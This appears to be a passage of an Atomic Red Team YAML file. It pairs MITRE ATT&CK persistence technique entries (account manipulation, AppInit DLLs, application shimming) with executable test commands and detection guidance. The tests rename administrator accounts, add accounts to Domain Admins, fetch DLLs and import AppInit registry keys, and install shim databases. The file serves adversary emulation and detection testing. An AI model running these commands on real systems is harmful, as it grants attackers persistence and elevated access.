Account manipulation may consist of any action that preserves adversary - access to a compromised account, such as modifying credentials or permission - groups. These actions could also include account activity designed to subvert - security policies, such as performing iterative password updates to bypass - password duration policies and preserve the life of compromised credentials. - In order to create or manipulate accounts, the adversary must already have - sufficient permissions on systems or the domain. - name: Account Manipulation - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-05T16:43:29.473Z' - created: '2017-05-31T21:31:12.196Z' - x_mitre_is_subtechnique: false - x_mitre_version: '2.1' - x_mitre_contributors: - - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) - - Praetorian - - Tim MalcomVetter - x_mitre_data_sources: - - Authentication logs - - Windows event logs - x_mitre_detection: |- - Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017) - - Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. - - Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. - x_mitre_platforms: - - Windows - - Office 365 - - Azure - - GCP - - Azure AD - - AWS - - Linux - - macOS - identifier: T1098 - atomic_tests: - - name: Admin Account Manipulate - auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af - description: 'Manipulate Admin Account Name - -' - supported_platforms: - - windows - executor: - command: | - $x = Get-Random -Minimum 2 -Maximum 9999 - $y = Get-Random -Minimum 2 -Maximum 9999 - $z = Get-Random -Minimum 2 -Maximum 9999 - $w = Get-Random -Minimum 2 -Maximum 9999 - Write-Host HaHa_$x$y$z - - $fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name - - foreach($member in $fmm) { - if($member -like "*Administrator*") { - $account = $member.Name -replace ".+\\\","" # strip computername\ - $originalDescription = (Get-LocalUser -Name $account).Description - Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description - Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation - Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME - } - } - cleanup_command: | - $list = Get-LocalUser |?{$_.Description -like "atr:*"} - foreach($u in $list) { - $u.Description -match "atr:(?[^;]+);(?.*)" - Set-LocalUser -Name $u.Name -Description $Matches.Description - Rename-LocalUser -Name $u.Name -NewName $Matches.Name - Write-Host "Successfully Reverted Account $($u.Name) to $($Matches.Name) on " $Env:COMPUTERNAME - } - name: powershell - elevation_required: true - - name: Domain Account and Group Manipulate - auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 - description: "Create a random atr-nnnnnnnn account and add it to a domain group - (by default, Domain Admins). \n\nThe quickest way to run it is against a domain - controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,\nyou need - to install PS Module ActiveDirectory (in prereqs) and run the script with - appropriare AD privileges to \ncreate the user and alter the group. Automatic - installation of the dependency requires an elevated session, \nand is unlikely - to work with Powershell Core (untested).\n\nIf you consider running this test - against a production Active Directory, the good practise is to create a dedicated\nservice - account whose delegation is given onto a dedicated OU for user creation and - deletion, as well as delegated\nas group manager of the target group.\n\nExample: - `Invoke-AtomicTest -Session $session 'T1098' -TestNames \"Domain Account and - Group Manipulate\" -InputArgs @{\"group\" = \"DNSAdmins\" }`\n" - supported_platforms: - - windows - input_arguments: - account_prefix: - description: | - Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on - a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. - type: String - default: atr- - group: - description: Name of the group to alter - type: String - default: Domain Admins - create_args: - description: Additional string appended to New-ADUser call - type: String - default: '' - dependencies: - - description: 'PS Module ActiveDirectory - -' - prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop - | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" - get_prereq_command: | - if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { - Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online - } else { - Install-WindowsFeature RSAT-AD-PowerShell - } - executor: - command: | - $x = Get-Random -Minimum 2 -Maximum 99 - $y = Get-Random -Minimum 2 -Maximum 99 - $z = Get-Random -Minimum 2 -Maximum 99 - $w = Get-Random -Minimum 2 -Maximum 99 - - Import-Module ActiveDirectory - $account = "#{account_prefix}-$x$y$z" - New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args} - Add-ADGroupMember "#{group}" $account - cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" - | Remove-ADUser -Confirm:$False - -' - name: powershell - T1098.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1098.003 - url: https://attack.mitre.org/techniques/T1098/003 - - source_name: Microsoft Support O365 Add Another Admin, October 2019 - url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d - description: Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. - - source_name: Microsoft O365 Admin Roles - url: https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide - description: Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. - al.. (2019, October 8). About admin roles. Retrieved October 18, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Add Office 365 Global Administrator Role - description: "An adversary may add the Global Administrator role to an adversary-controlled - account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft - Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin - Roles) With sufficient permissions, a compromised account can gain almost - unlimited access to data and settings (including the ability to reset the - passwords of other admins) via the global admin role.(Citation: Microsoft - O365 Admin Roles) \n\nThis account modification may immediately follow [Create - Account](https://attack.mitre.org/techniques/T1136) or other malicious account - activity." - id: attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T12:40:02.331Z' - created: '2020-01-19T16:59:45.362Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: 'Collect usage logs from cloud administrator accounts to - identify unusual activity in the assignment of roles to those accounts. Monitor - for accounts assigned to admin roles that go over a certain threshold of known - admins. ' - x_mitre_data_sources: - - Office 365 audit logs - x_mitre_contributors: - - Microsoft Threat Intelligence Center (MSTIC) - x_mitre_platforms: - - Office 365 - atomic_tests: [] - T1137.006: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.006 - url: https://attack.mitre.org/techniques/T1137/006 - - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460 - description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017. - source_name: Microsoft Office Add-ins - - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/ - description: Knowles, W. (2017, April 21). Add-In Opportunities for Office - Persistence. Retrieved July 3, 2017. - source_name: MRWLabs Office Persistence Add-ins - - source_name: FireEye Mail CDS 2018 - url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf - description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! - Enterprise Email Compromise. Retrieved April 22, 2019. - - source_name: GlobalDotName Jun 2019 - url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique - description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - - A Stealthy Office Persistence Technique. Retrieved August 26, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Add-ins - description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence - on a compromised system. Office add-ins can be used to add functionality to - Office programs. (Citation: Microsoft Office Add-ins) There are different - types of add-ins that can be used by the various Office products; including - Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object - Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools - for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office - Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\nAdd-ins can be used - to obtain persistence because they can be set to execute code when an Office - application starts. " - id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-26T17:34:02.877Z' - created: '2019-11-07T19:52:52.801Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins) - - Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior - x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Windows Registry - - Process monitoring - x_mitre_platforms: - - Windows - - Office 365 - atomic_tests: [] - T1098.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1098.001 - url: https://attack.mitre.org/techniques/T1098/001 - - source_name: Create Azure Service Principal - url: https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli?toc=%2Fazure%2Fazure-resource-manager%2Ftoc.json&view=azure-cli-latest - description: Microsoft. (2020, January 8). Create an Azure service principal - with Azure CLI. Retrieved January 19, 2020. - - source_name: Blue Cloud of Death - url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1 - description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming - Azure. Retrieved October 23, 2019.' - - source_name: Blue Cloud of Death Video - url: https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815 - description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming - Azure. Retrieved November 21, 2019.' - - source_name: Why AAD Service Principals - url: https://github.com/microsoft/AzureSuperpowers/blob/master/docs/AzureSuperpowers.md#why-aad-service-principals - description: Microsoft. (2019, September 23). Azure Superpowers Lab Manual. - Retrieved January 19, 2020. - - source_name: Demystifying Azure AD Service Principals - url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/ - description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service - Principals. Retrieved January 19, 2020. - - source_name: GCP SSH Key Add - url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add - description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved - October 1, 2020. - - source_name: Expel IO Evil in AWS - url: https://expel.io/blog/finding-evil-in-aws/ - description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding - Evil in AWS. Retrieved June 25, 2020. - - source_name: Expel Behind the Scenes - url: https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/ - description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, - July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved - October 1, 2020.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Additional Cloud Credentials - description: |- - Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. - - Adversaries may add credentials for Azure Service Principals in addition to existing legitimate credentials(Citation: Create Azure Service Principal) to victim Azure accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) Azure Service Principals support both password and certificate credentials.(Citation: Why AAD Service Principals) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules.(Citation: Demystifying Azure AD Service Principals) - - After gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) - id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-05T16:43:27.024Z' - created: '2020-01-19T16:10:15.008Z' - x_mitre_contributors: - - Expel - - Oleg Kolesnikov, Securonix - - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) - x_mitre_version: '2.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor Azure Activity Logs for service principal modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account. - - Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. - x_mitre_data_sources: - - Stackdriver logs - - GCP audit logs - - AWS CloudTrail logs - - Azure activity logs - x_mitre_platforms: - - Azure AD - - Azure - - AWS - - GCP - atomic_tests: [] - T1546.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.009 - url: https://attack.mitre.org/techniques/T1546/009 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - url: https://forum.sysinternals.com/appcertdlls_topic12546.html - description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. - Retrieved December 18, 2017. - source_name: Sysinternals AppCertDlls Oct 2007 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: AppCert DLLs - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by AppCert DLLs loaded into processes. - Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs - Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session - Manager\\ are loaded into every process that calls the ubiquitously - used application programming interface (API) functions CreateProcess, - CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, - or WinExec. (Citation: Endgame Process Injection July 2017)\n\nSimilar - to [Process Injection](https://attack.mitre.org/techniques/T1055), this value - can be abused to obtain elevated privileges by causing a malicious DLL to - be loaded and run in the context of separate processes on the computer. Malicious - AppCert DLLs may also provide persistence by continuously being triggered - by API activity. " - id: attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T20:22:45.298Z' - created: '2020-01-24T14:47:41.795Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: "Monitor DLL loads by processes, specifically looking for - DLLs that are not recognized or not normally loaded into a process. Monitor - the AppCertDLLs Registry value for modifications that do not correlate with - known software, patch cycles, etc. Monitor and analyze application programming - interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx - and RegSetValueEx. (Citation: Endgame Process Injection July 2017) \n\nTools - such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting - location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls - Oct 2007)\n\nLook for abnormal process behavior that may be due to a process - loading a malicious DLL. Data and events should not be viewed in isolation, - but as part of a chain of behavior that could lead to other activities, such - as making network connections for Command and Control, learning details about - the environment through Discovery, and conducting Lateral Movement." - x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - Loaded DLLs - x_mitre_platforms: - - Windows - atomic_tests: [] - T1546.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.010 - url: https://attack.mitre.org/techniques/T1546/010 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://support.microsoft.com/en-us/kb/197571 - description: Microsoft. (2006, October). Working with the AppInit_DLLs registry - value. Retrieved July 15, 2015. - source_name: AppInit Registry - - url: https://msdn.microsoft.com/en-us/library/dn280412 - description: Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July - 15, 2015. - source_name: AppInit Secure Boot - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: AppInit DLLs - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by AppInit DLLs loaded into processes. - Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs - value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows - NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows - NT\\CurrentVersion\\Windows are loaded by user32.dll into every process - that loads user32.dll. In practice this is nearly every program, since user32.dll - is a very common library. (Citation: Endgame Process Injection July 2017)\n\nSimilar - to Process Injection, these values can be abused to obtain elevated privileges - by causing a malicious DLL to be loaded and run in the context of separate - processes on the computer. (Citation: AppInit Registry) Malicious AppInit - DLLs may also provide persistence by continuously being triggered by API activity. - \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions - when secure boot is enabled. (Citation: AppInit Secure Boot)" - id: attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T20:34:09.996Z' - created: '2020-01-24T14:52:25.589Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_system_requirements: - - Secure boot disabled on systems running Windows 8 and later - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_permissions_required: - - Administrator - x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and - look for DLLs that are not recognized or not normally loaded into a process. - Monitor the AppInit_DLLs Registry values for modifications that do not correlate - with known software, patch cycles, etc. Monitor and analyze application programming - interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx - and RegSetValueEx. (Citation: Endgame Process Injection July - 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system - changes that could be attempts at persistence, including listing current AppInit - DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior - that may be due to a process loading a malicious DLL. Data and events should - not be viewed in isolation, but as part of a chain of behavior that could - lead to other activities, such as making network connections for Command and - Control, learning details about the environment through Discovery, and conducting - Lateral Movement." - x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - Loaded DLLs - x_mitre_platforms: - - Windows - identifier: T1546.010 - atomic_tests: - - name: Install AppInit Shim - auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 - description: "AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs - to be loaded into each user mode process on the system. Upon succesfully execution, - \nyou will see the message \"The operation completed successfully.\" Each - time the DLL is loaded, you will see a message box with a message of \"Install - AppInit Shim DLL was called!\" appear.\nThis will happen regularly as your - computer starts up various applications and may in fact drive you crazy. A - reliable way to make the message box appear and verify the \nAppInit Dlls - are loading is to start the notepad application. Be sure to run the cleanup - commands afterwards so you don't keep getting message boxes showing up\n" - supported_platforms: - - windows - input_arguments: - registry_file: - description: Windows Registry File - type: Path - default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg - registry_cleanup_file: - description: Windows Registry File - type: Path - default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg - dependency_executor_name: powershell - dependencies: - - description: 'Reg files must exist on disk at specified locations (#{registry_file} - and #{registry_cleanup_file}) - -' - prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) - {exit 0} else {exit 1} - -' - get_prereq_command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" - - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and - T1546.010x86.dll) - -' - prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) - {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll - executor: - command: 'reg.exe import #{registry_file} - -' - cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - -' - name: command_prompt - elevation_required: true - T1546.011: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.011 - url: https://attack.mitre.org/techniques/T1546/011 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - source_name: FireEye Application Shimming - url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf - description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved - May 4, 2020. - - url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf - description: Pierce, Sean. (2015, November). Defending Against Malicious Application - Compatibility Shims. Retrieved June 22, 2017. - source_name: Black Hat 2015 App Shim - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Application Shimming - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by application shims. The Microsoft - Windows Application Compatibility Infrastructure/Framework (Application Shim) - was created to allow for backward compatibility of software as the operating - system codebase changes over time. For example, the application shimming feature - allows developers to apply fixes to applications (without rewriting code) - that were created for Windows XP so that it will work with Windows 10. (Citation: - Endgame Process Injection July 2017)\n\nWithin the framework, shims are created - to act as a buffer between the program (or more specifically, the Import Address - Table) and the Windows OS. When a program is executed, the shim cache is referenced - to determine if the program requires the use of the shim database (.sdb). - If so, the shim database uses hooking to redirect the code as necessary in - order to communicate with the OS. \n\nA list of all shims currently installed - by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb - and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom - databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom - and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo - keep shims secure, Windows designed them to run in user mode so they cannot - modify the kernel and you must have administrator privileges to install a - shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) - (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data - Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), - and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims - may allow an adversary to perform several malicious acts such as elevate privileges, - install backdoors, disable defenses like Windows Defender, etc. (Citation: - FireEye Application Shimming) Shims can also be abused to establish persistence - by continuously being invoked by affected programs." - id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-04T19:05:30.140Z' - created: '2020-01-24T14:56:24.231Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim): - - * Shim-Process-Scanner - checks memory of every running process for any shim flags - * Shim-Detector-Lite - detects installation of custom shim databases - * Shim-Guard - monitors registry for any shim installations - * ShimScanner - forensic tool to find active shims in memory - * ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot) - - Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - x_mitre_platforms: - - Windows - identifier: T1546.011 - atomic_tests: - - name: Application Shim Installation - auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 - description: "Install a shim database. This technique is used for privilege - escalation and bypassing user access control.\nUpon execution, \"Installation - of AtomicShim complete.\" will be displayed. To verify the shim behavior, - run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin - directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\" - as defined in the AtomicTest.dll. To better understand what is happening, - review\nthe source code files is the \\\\T1546.011\\\\src - directory.\n" - supported_platforms: - - windows - input_arguments: - file_path: - description: Path to the shim database file - type: String - default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb - dependency_executor_name: powershell - dependencies: - - description: 'Shim database file must exist on disk at specified location - (#{file_path}) - -' - prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - -' - prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit - 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll - executor: - command: 'sdbinst.exe #{file_path} - -' - cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: New shim database files created in the default shim database directory - auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d - description: | - Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database - - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb - Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb - cleanup_command: | - Remove-Item C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb -ErrorAction Ignore - Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Registry key creation and/or modification events for SDB - auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f - description: | - Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing - the registry keys that were created. These keys can also be viewed using the Registry Editor. - - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - supported_platforms: - - windows - executor: - command: | - New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" - New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name 